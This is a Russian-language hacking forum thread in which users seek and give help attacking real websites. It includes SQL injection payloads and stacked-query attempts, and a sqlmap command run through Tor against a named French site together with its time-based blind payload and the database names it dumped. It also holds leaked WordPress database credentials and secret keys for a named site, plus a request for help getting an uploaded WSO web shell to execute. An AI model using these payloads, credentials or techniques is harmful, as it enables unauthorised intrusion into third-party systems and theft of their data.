ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.11.2020, 22:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от Forserer
Forserer said:
↑
Попытался просто видоизменить конец запроса, но комментарий -- # /* не отрабатывает
тоже вываливается в ошибку На скрине видна ошибка только в случае многострочного комментария, который должен быть закрыт по спецификации синтаксиса.
Сообщение от Forserer
Forserer said:
↑
Возможно ли как то провести sql иньекцию? Не вижу проблем, почему нельзя использовать lastnameещё раз и просто вклиниться в запрос не прибегая к комментированию, примерно таким образом:
Код:
Code:
xxx', lastname = @@version, firstname = 'xxx
При этом превое значение lastname должно быть проигнорировано.
Сообщение от Forserer
Forserer said:
↑
так, а как доработать вот такой запрос для получения какой либо инфы через UNION Маны по MySQLi вам в помощь:
//threads/43966/
https://rdot.org/forum/showthread.php?t=124
https://rdot.org/forum/showthread.php?t=60
Не стоит брезговать, по причине давних дат публикации материалов, с тех времён кардинально ничего не поменялось. В случае непоняток, всегда можно уточнить здесь, а не просить раскручивать за ваc простейшие инъекции в запросах выборки.
|
|
|
|
05.11.2020, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
12287
Репутация:
0
|
|
Сообщение от Forserer
Forserer said:
↑
так, а как доработать вот такой запрос для получения какой либо инфы через UNION
Код:
Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612
В таком запросе получилось только через ошибку вывести данные, прямого вывода на страницу нету видимо, но в таком запросе не получится сделать через ошибку INSERT или UPDATE ?
Такой вариант не работает. База 10.3.9-MariaDB
Код:
Code:
SELECT h.* From oc_help h LEFT JOIN `oc_help_to_blog` htb USING (help_id) WHERE htb.blog_id = 4612; UPDATE ...
|
|
|
|
13.01.2021, 18:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
8898
Репутация:
0
|
|
Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
.SpoilerTarget" type="button">Spoiler: данные
nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QE xv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+
|
|
|
|
13.01.2021, 18:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
14421
Репутация:
3
|
|
Любым mysql-клиентом к базе подключиться, однако сдается мне, что mysql-сервер слушает только на localhost, а доступа к этому самому localhost Вы не имеете.
|
|
|
|
13.01.2021, 21:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
7581
Репутация:
0
|
|
[QUOTE="anton liga"]
anton liga said:
↑
Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
Spoiler: данные
nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QE xv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+nRe]EhlT[');
define('LOGGED_IN_KEY', '?@]WrjTLAChQ}ndj}r%6ry`9{>naV,`%`&9!Lm{}wa@PY^Y=f@)QE xv1mM]X6Lkk');
define('NONCE_KEY', 'J$+y?FTAc@D6)?w j!(cy&Uw|A!((@?gz^ xj{9jLlI3X-p*J!-1)Qc$h/fxhR>N');
define('AUTH_SALT', 'uc8K{*v$8{V?}hqlwjbJabr+ cYSv[N=wU0qooX]QdG^R?BTL{xSU&WD+oefQ:K;');
define('SECURE_AUTH_SALT', 'Hi+|oN@oSZ*n}O4L-bB&pr:5 ;$;HjMX!RQf}Vv*1J R|5e~-SKjINvPbbL#q6D,');
define('LOGGED_IN_SALT', '4pQD.YnB~dbh-vC4xW}.L@`Km_{uC+ |
|
|
|
19.01.2021, 03:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
213865
Репутация:
72
|
|
Сообщение от anton liga
anton liga said:
↑
Парни,привет! есть вот такая инфа,подскажите пожалуйста и если можно,то прям тыкните носом в строчки,что можно с этим сделать?
если я правильно понимаю,то это ключи от БД логином и паролем..как это можно использовать и через какие проги..у меня на уме только бурп..
Spoiler: данные
define('DB_NAME', 'rtik_wke58w5ehjrkew5u');
/** MySQL database username */
define('DB_USER', 'rtik_cucok507');
/** MySQL database password */
define('DB_PASSWORD', 'dkjfy538i235rkewnfkwe57j56');
/** MySQL hostname */
define('DB_HOST', 'localhost'); Этим данным уже лет 7+
.SpoilerTarget" type="button">Spoiler: 2015
gerkatinsolo.or.id/wp-content/uploads/fgallery/config/
file60 источник
|
|
|
|
19.01.2021, 04:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
213865
Репутация:
72
|
|
|
|
|
|
03.02.2021, 15:23
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Help
Код:
Code:
https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires
|
|
|
05.02.2021, 11:51
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Help
Код:
Code:
https://www.castagniccia-maremonti.com/index.php?id=26+order+by+7+--+&type_page=detail_affaires
Сообщение от None
sqlmap --url="
https://www.castagniccia-maremonti.c...etail_affaires
" --random-agent --tor --tor-port=9150 --tor-type=SOCKS5 --threads=10 --dbms=Mysql --tamper="between,randomcase,space2comment" --keep-alive waf --dbs --batch
......
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
https://www.castagniccia-maremonti.c...ndex.php?id=26
' AND (SELECT 9803 FROM (SELECT(SLEEP(10)))QnOf) AND 'SbQB'='SbQB&type_page=detail_affaires
---
......
available databases [2]:[*] `otcmm-taxesejour`[*] information_schema
|
|
|
|
05.02.2021, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
7210
Репутация:
0
|
|
Доброго времени всем. Подскажите пожалуйста по не скольким вопросам. Есть сайт. Из админки есть возможность делать импорт в базу данных.
Возможно ли как-то получить шелл? Пути не известны.
Так же есть возможность загружать файлы, но в чистом виде .php файл грузиться не хочет.
Переименовав к примеру в .php3 загрузка происходит. С добавлением рандомного имени в конце.
Пример: wso.php3.53aadaa50075c72420b8656f14b0b68c
При переходе по ссылке, шелл не отображается, а происходит скачивание.
С этим можно что-то сделать? Заранее благодарен.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
